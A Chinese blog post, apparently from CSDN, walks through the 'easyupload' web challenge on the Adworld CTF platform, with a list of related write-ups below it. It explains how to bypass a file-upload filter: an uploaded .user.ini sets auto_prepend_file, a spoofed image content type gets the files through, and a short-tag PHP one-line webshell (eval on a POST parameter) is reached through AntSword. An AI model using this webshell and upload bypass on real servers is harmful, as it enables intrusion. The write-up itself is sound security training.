【攻防世界】Web easyupload

最新推荐文章于 2024-04-26 12:47:54 发布
最新推荐文章于 2024-04-26 12:47:54 发布
阅读量923 收藏 1
点赞数
分类专栏: CTF平台 文章标签: php apache web安全 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44830645/article/details/128495561
版权

知识点讲解

本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行
关于.user.ini文件是怎么利用的,可以点此查看非常详细,我这里截取一段

.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们能够自定义的设置是模式为“PHP_INI_PERDIR、PHP_INI_USER”的设置。
而且,和php.ini不同的是,.user.ini是一个能被动态加载的ini文件。也就是说我修改了.user.ini后,不需要重启服务器中间件,只需要等待user_ini.cache_ttl所设置的时间(默认为300秒),即可被重新加载
使用方法:
指定一个文件,自动包含在要执行的文件前,类似于在文件前调用了require()函数。而auto_append_file类似,只是在文件后面包含。 使用方法很简单,直接写在.user.ini中:
auto_prepend_file=01.gif
01.gif是要包含的文件。
所以,我们可以借助.user.ini轻松让所有php文件自动包含某个文件,而这个文件可以是一个正常php文件,也可以是一个包含一句话的webshell。

上传的时候会检测文件内有没有php标签,导致上传不了,我们可以使用短标签进行绕过,以下是介绍

从PHP5.4.0开始,无论php.ini中如何设置,都可以使用短标签。
以下为例子:
一句话木马:<?= eval($_POST[cmd]);?>

了解了以上的知识之后,我们就可以开始做题了

开始做题

创建环境后打开页面,是一个上传界面
在这里插入图片描述
正常上传php文件,是不可行的
在这里插入图片描述
我们尝试上传一个.user.ini上去,让他使所有php文件都自动包含我们的一句话木马
在这里插入图片描述
记得要把文件类型改成图片格式的
在这里插入图片描述
文件上传成功,我们再上传一个a.gif,里面用短标签写上一句话木马
在这里插入图片描述
上传成功,我们使用蚁剑连接一下,这里注意,连接的时候是index.php
在这里插入图片描述
连接上去之后,我们查看/flag文件就可以得到flag了
在这里插入图片描述
此题结束

结尾

学到了新的知识,比如php短标签绕过,比如专用于fastcgi的.user.ini文件

Starry`Quan
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | CTF】攻防世界 easyupload 解题详析
等风来
07-31 7387
抓包改后缀,.php1~.php9、.htaccess均被过滤(.htaccess 文件是一个用于配置 Apache Web 服务器的配置文件。它通常位于网站根目录或特定目录中,用来为该目录及其子目录提供特定的配置指令):提示:只要是运用了fastcgi的服务器都能够利用该方式getshell,不论是apache或者ngnix或是其他服务器。
攻防世界】CTF 网络安全学习 easyupload
Bing_Geng的博客
11-15 594
中国蚁剑 kali 零基础安装中国蚁剑 user.ini PHP 配置
攻防世界easyupload(小白自学)
最新发布
qq_75161850的博客
04-26 715
攻防世界easyupload(小白自学)详细教程
【愚公系列】2023年05月 攻防世界-Webeasyupload
时光隧道
05-23 8230
文件上传漏洞是指攻击者通过上传恶意文件的方式,绕过服务器的安全机制,向服务器上传含有恶意代码的文件,从而实现对服务器的攻击。攻击者可以通过文件上传漏洞,上传包含木马、病毒、WebShell等恶意代码的文件,进而获取服务器的控制权。攻击者可以利用这些恶意文件进行各种攻击,如窃取敏感数据、修改网站内容、加密勒索等。要避免文件上传漏洞,可以采取以下措施:对上传文件的类型和大小进行限制,并对上传的文件进行检查和过滤;对上传文件的存储路径进行限制,并且不要使用可执行文件的存储路径;
攻防世界ctf题目easyupload
weixin_71982689的博客
07-07 246
包含后,相当于将jpg的内容复制一份到index.php文件中,所以,只要jpg内容包含合法的php代码,当我们访问/uploads/index.php时,就能够执行。但是改值好麻烦啊,看到其他师傅说用gif的GIF89a这个标识头,挺好,这个不是乱码,能直接在Raw里写。通过查看前端源代码找到uploads/index.php文件,现在这个文件已经包含了我们传入的文件内容。文件名:.user.ini,这是一个用户自定义的文件,用于给特定的目录做设置。看一眼,好像文件头标识有点问题,乱七八糟。
攻防世界easyupload
m0_73303597的博客
11-10 437
自用
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项】是一道网络安全领域中的挑战,属于攻防世界的Misc类问题。Misc( Miscellaneous)通常指的是涉及多种技术、需要综合运用知识的题目,这道题目的核心在于理解和处理压缩文件,特别是涉及到...
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
CTF-WEB攻防世界题目实战解析easyupload
2301_76565920的博客
04-23 1204
题目:easyupload 难度:1知识点:上传漏洞,服务器防护绕过,后门,.user.ini,auto_prepend_file的使用
攻防世界-WEB-easyupload
Lucifer的专栏
09-11 520
2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为。如图所示上传地址为:****/uploads/index.php。PS:按F12打开调试器选择网络查看上传文件的地址。1.新建.user.ini文件,内容如下。4. 新建a.txt文件,内容为。保存后将文件后缀修改为.jpg。5.直接上传该文件即可成功上传。
攻防世界-web-easyupload
wuh2333的博客
04-09 609
攻防世界,文件上传
easyupload攻防世界web新手)
2401_82463993的博客
03-07 490
将 Content-Type: application/octet-stream 修改为 Content-Type: image/jpg。打开bp浏览器访问场景地址,上传.user.ini文件,查看bp的数据包,ctel+R发到Repeater模块。再次检查下上传的.user.ini、ymmy.jpg文件。/uploads/index.php路径访问上传的文件。再创建一个后缀名为.ini格式的文件。看下抓到的数据包里面有上传文件的路径。.user.ini:用户配置文件。文件上传bp抓包,改包。
攻防世界easyupload题解与user.ini的前世今生[DOGE]
m0_66935689的博客
10-04 234
哟呵,没上传成功还返回了一个英语句子,用我练习时长两年半的工地英语浅浅翻译一下,大概意思是“你的文件糟糕极了”说实话我也有被我自己的英语水平震撼到[doge]发现多了一个“index.php”即http://xxxxx/uploads/index.php盲猜传这去了。没连上,在看官方的writeup时了解到了一个东西,也是今天的主角——.user.ini。既然后缀是图片也过不去,推测出应该是对文件内容进行了检查。这道题也是有点意思的,坑也有点多,但能学到的东西也还行。看到了文件头,进一步证实了我的猜想。
攻防世界web_easyupload
Blue的博客
02-22 437
攻防世界web_easyupload
ZTJL1
qq_75005708的博客
10-05 174
查看PHP回到页面访问php,访问结果如下前面还比较好理解给出用户名和密码,但是后面就出现一个函数,我们应该要绕过它,接着往下看一下,它需要admin=admin,然后就passwd=wllm,如果可以满足这个条件,就可以拿到flag了,现在关键的问题就是我们要绕过函数。__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行程序调用反序列化方法时,会自动执行__weakup()函数payloads:4:"wllm";
攻防世界easyupload .user.ini的使用
NNASJ的博客
02-01 409
但还是提示文件类型不正确,这时我们进行修改,将Content-Type修改为image/jpeg后,回显仍没有改变,继续修改将文件内容前加上文件头GIF89a,仍没有回显,检查文件内容后发现上传的木马,含有php字眼,进行修改为不带php字眼的一句话木马。上传成功,说明此时再上传图片马,图片马就可以被解析,进而被连接,所以我们要重新再上传一次,上传的内容,跟我们第一次上传的内容一样。随便上传一个php文件,发现报错了。打开题目发现是一个文件上传的界面。攻防世界easyupload。第四步:检查上传的内容。
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值